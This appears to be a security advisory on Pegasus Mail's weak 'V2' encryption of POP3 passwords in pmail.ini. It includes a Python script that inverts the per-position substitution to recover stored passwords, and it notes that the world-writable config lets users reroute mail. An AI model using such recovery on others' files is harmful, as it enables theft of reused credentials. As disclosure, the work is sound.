Pegasus Mail uses a weak encryption algorithm to protect the POP3 logon password it stores in the user's pmail.ini. The algorithm has been reverse-engineered, which makes recovering the password from the configuration file trivial.
Credit:
The algorithm was cracked by: galldor
The POP3 password is stored in \mail\USER\pmail.ini under the Pegasus install directory, so 'c:\pmail\mail\g00f\pmail.ini' is the configuration file for the user g00f.
The file looks something like this:
[Pegasus Mail for Windows - built-in TCP/IP Mail]
Host where POP3 mail account is located = example.com
POP3 mail account (username on host) = g00f
V2 Password for POP3 mail account = $moL
Delete downloaded mail from host = Y
Largest message size to retrieve = 0
Directory to place incoming POP3 mail = C:\PMAIL\MAIL\g00f
Transport control word = 66308
SMTP relay host for outgoing mail = example.com
Search mask to locate outgoing messages = C:\PMAIL\MAIL\g00f\*.PMX
Alternative From: field for message = galldor@microhack.com
Since this text file is world-readable and writable, any user can edit it to route incoming messages to a different directory, or to stop POP3 mail from being deleted from the host.
The main problem, however, is the weak encryption of the V2 Password.
The scheme is a position-dependent substitution: the ciphertext has exactly as many characters as the plaintext password, and each ciphertext character depends only on the plaintext character and its position in the password.
Cracking It:
First, ignore the leading $ completely; it is only a marker. The letters and numbers after the $ are the encrypted characters of the password, so the number of characters after the $ is also the length of the password. Here are a few examples of how the encryption works and how to reverse it.
a = $m # Just testing....
aa = $mo
aaa = $moL
b = $R
bb = $R?
bbb = $R?8
# As you can see, the weakness is already showing: the encryption does not even vary with the number of letters, as the ciphertext of 'a' is a prefix of that of 'aa' and 'aaa'.
# The encryption works like this:
a in 1st position = m
a in 2nd position = o
a in 3rd position = L
Etc, etc. (and likewise b in 1st position = R, 2nd position = ?, 3rd position = 8)
So aab is found as follows:
aab = 1st a + 2nd a + 3rd b = mo8 # so in the ini the password will appear as $mo8
abb = 1st a + 2nd b + 3rd b = m?8 # $m?8 in the ini
And by the same rule:
bab = 1st b + 2nd a + 3rd b = Ro8 # $Ro8 in the ini
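The table-building and inversion described above, written out as a small script. This is an added example, not galldor's tool or any Pegasus Mail code: it learns a per-position mapping from the known plaintext/ciphertext pairs shown on this page, then inverts it position by position to recover passwords such as $mo8 and $Ro8. The pair list and the pmail.ini excerpt are constructed from the page's examples; a real attack would extend the table by setting chosen passwords in the client and reading the V2 field back for every character at every position, which this script only assumes.

```python
"""Recover a Pegasus Mail 'V2' POP3 password from pmail.ini.

The V2 scheme, as described above, is a position-dependent substitution:
the ciphertext has the same length as the password, and the cipher
character at position i depends only on the plaintext character at
position i.  A table of (position, cipher char) -> plaintext char learned
from known passwords can therefore be inverted directly.
"""

# Known (plaintext, V2 ciphertext) pairs, taken from the examples on this
# page.  Only 'a' and 'b' in positions 1-3 are covered; extending coverage
# means generating more pairs from the client (assumed, not shown here).
KNOWN_PAIRS = [
    ("a", "$m"),
    ("aa", "$mo"),
    ("aaa", "$moL"),
    ("b", "$R"),
    ("bb", "$R?"),
    ("bbb", "$R?8"),
]

# Constructed pmail.ini excerpt mirroring the one shown on this page.
SAMPLE_INI = """[Pegasus Mail for Windows - built-in TCP/IP Mail]
Host where POP3 mail account is located = example.com
POP3 mail account (username on host) = g00f
V2 Password for POP3 mail account = $moL
Delete downloaded mail from host = Y
"""

V2_KEY = "V2 Password for POP3 mail account"
UNKNOWN = "\u00b7"   # middle dot marks a position the table cannot invert


def strip_prefix(v2):
    """Drop the leading '$' marker; everything after it is the ciphertext."""
    if not v2.startswith("$"):
        raise ValueError(f"not a V2 password field: {v2!r}")
    return v2[1:]


def learn_table(pairs):
    """Build {(position, cipher_char): plain_char} from known pairs.

    Raises ValueError if the pairs contradict the positional-substitution
    model, i.e. if the scheme is not what this script assumes.
    """
    forward = {}   # (pos, plain) -> cipher, used only to detect contradictions
    inverse = {}   # (pos, cipher) -> plain, used for recovery
    for plain, v2 in pairs:
        cipher = strip_prefix(v2)
        if len(cipher) != len(plain):
            raise ValueError(f"{v2!r}: length differs from plaintext {plain!r}")
        for pos, (p, c) in enumerate(zip(plain, cipher), start=1):
            if forward.setdefault((pos, p), c) != c:
                raise ValueError(f"position {pos}: {p!r} encrypts to both "
                                 f"{forward[(pos, p)]!r} and {c!r}")
            if inverse.setdefault((pos, c), p) != p:
                raise ValueError(f"position {pos}: {c!r} decrypts to both "
                                 f"{inverse[(pos, c)]!r} and {p!r}")
    return inverse


def recover(v2, table):
    """Invert the table position by position.

    Returns (plaintext, missing_positions); cells the table does not cover
    are marked with UNKNOWN and listed rather than guessed.
    """
    plain, missing = [], []
    for pos, c in enumerate(strip_prefix(v2), start=1):
        p = table.get((pos, c))
        if p is None:
            missing.append(pos)
            plain.append(UNKNOWN)
        else:
            plain.append(p)
    return "".join(plain), missing


def v2_from_ini(ini_text):
    """Pull the V2 field out of pmail.ini text (simple 'key = value' parser)."""
    for line in ini_text.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == V2_KEY:
            return value.strip()
    raise KeyError(V2_KEY)


if __name__ == "__main__":
    table = learn_table(KNOWN_PAIRS)
    field = v2_from_ini(SAMPLE_INI)
    print(field, "->", recover(field, table))
    for sample in ("$mo8", "$m?8", "$Ro8", "$Rx"):
        print(sample, "->", recover(sample, table))
```

The consistency checks in learn_table matter: if two different plaintext characters at the same position ever produced the same cipher character, or one plaintext character produced two, the scheme would not be a per-position substitution and a lookup table would be the wrong tool. With the page's six pairs the table only covers 'a' and 'b' in the first three positions, so $Rx recovers as b followed by an unknown marker, and position 2 is reported as missing.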
As Pegasus is a popular mail client on Windows networks, this can mean a serious security compromise, since POP3 passwords are very often the same as the user's telnet/ssh and other passwords. Older versions of Pegasus use the same kind of encryption.